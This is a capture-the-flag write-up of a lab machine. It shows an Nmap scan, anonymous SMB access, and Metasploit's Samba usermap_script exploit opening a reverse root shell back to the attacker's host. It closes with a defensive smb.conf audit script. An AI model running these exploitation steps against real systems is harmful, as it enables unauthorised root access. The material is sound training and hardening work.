This was such an easy machine that it's almost not worth writing up, but I decided in the end that I would, purely for completeness.
I scanned the machine with Nmap and was presented with the following details.
# Nmap 7.70 scan initiated Thu Aug 22 10:10:07 2019 as: nmap -A -p- -oN scan 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.065s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d23h03m38s, deviation: 0s, median: -2d23h03m38s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-19T02:31:04-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   30.07 ms 10.10.14.1
2   31.77 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 10:35:22 2019 -- 1 IP address (1 host up) scanned in 1516.09 seconds
From here we can see that FTP, SMB, distcc and SSH are all running. Anonymous access was allowed on FTP, but there are no files present. I next tried connecting to SMB:
root@kali://root/websvr# smbclient \\\\10.10.10.3\\tmp -p 445
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Dec  6 16:56:00 2019
  ..                                 DR        0  Sun May 20 20:36:12 2012
  orbit-makis                        DR        0  Fri Dec  6 11:25:31 2019
  .ICE-unix                          DH        0  Fri Dec  6 11:03:09 2019
  .X11-unix                          DH        0  Fri Dec  6 11:03:34 2019
  gconfd-makis                       DR        0  Fri Dec  6 11:25:31 2019
  .X0-lock                           HR       11  Fri Dec  6 11:03:34 2019
  5120.jsvc_up                        R        0  Fri Dec  6 11:04:17 2019

                7282168 blocks of size 1024. 5678284 blocks available
You can see from the output that we also have anonymous SMB access. However, after browsing around, there are no useful files stored within SMB either.
One of the details detected in the Nmap scan was that Samba 3.0.20-Debian was being used. I did a Google search for exploits involving this version of Samba and found the Username Map Script exploit, which allows command execution by specifying a username containing shell metacharacters. This exploit is included in Metasploit, so I started msfconsole and ran it:
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RXu673TIo0yJNYIz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RXu673TIo0yJNYIz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:59078) at 2019-12-09 20:05:13 +0000

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
root
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
[REDACTED]
From the output you can see the exploit ran successfully. Entering the whoami command showed that I was running as root, so I was able to browse to /root and cat root.txt.
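Both weaknesses this box relied on, a 'username map script' in Samba's [global] section (the directive the usermap_script exploit abuses) and a share that lets anonymous clients in, are visible in smb.conf. The following audit script is an added example, not part of the original write-up; the sample configuration it checks is constructed and the script path in it is a placeholder.

```python
import re
SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
PARAM_RE = re.compile(r"^\s*([^=;#]+?)\s*=\s*(.*?)\s*$")
TRUTHY = {"yes", "true", "1"}

def parse_smb_conf(text):
    """Minimal smb.conf parser: {section -> {normalised parameter -> value}}.
    Parameter names are case-insensitive and ignore whitespace ('Guest OK' == 'guestok')."""
    sections, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.lstrip()[0] in ";#":
            continue  # blank line or comment
        sec = SECTION_RE.match(line)
        if sec:
            current = sec.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        kv = PARAM_RE.match(line)
        if kv and current is not None:
            sections[current][re.sub(r"\s+", "", kv.group(1)).lower()] = kv.group(2)
    return sections

def audit_smb_conf(text):
    """Return one finding string per weakness; an empty list means nothing flagged."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings = []
    script = glob.get("usernamemapscript")
    if script:  # the directive the usermap_script exploit abuses on Samba 3.0.20
        findings.append(f"global: 'username map script' = {script!r} runs with the "
                        "client-supplied username; remove it or patch Samba")
    if glob.get("maptoguest", "never").lower() != "never":
        findings.append("global: 'map to guest' turns failed logins into guest sessions")
    for name, params in conf.items():
        # a share inherits 'guest ok' from [global] unless it sets it ('public' is a synonym)
        guest = params.get("guestok", params.get("public", glob.get("guestok", "no")))
        if name != "global" and guest.lower() in TRUTHY:
            findings.append(f"[{name}]: anonymous (guest) access allowed")
    return findings

# Constructed sample with the weak settings seen in the write-up; the script path is a placeholder
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = bad user
   username map script = /path/to/mapusers.sh
[tmp]
   guest ok = yes
"""
```

Running `audit_smb_conf(SAMPLE_SMB_CONF)` returns three findings; a configuration with no map script, `map to guest = never` and no guest shares returns an empty list.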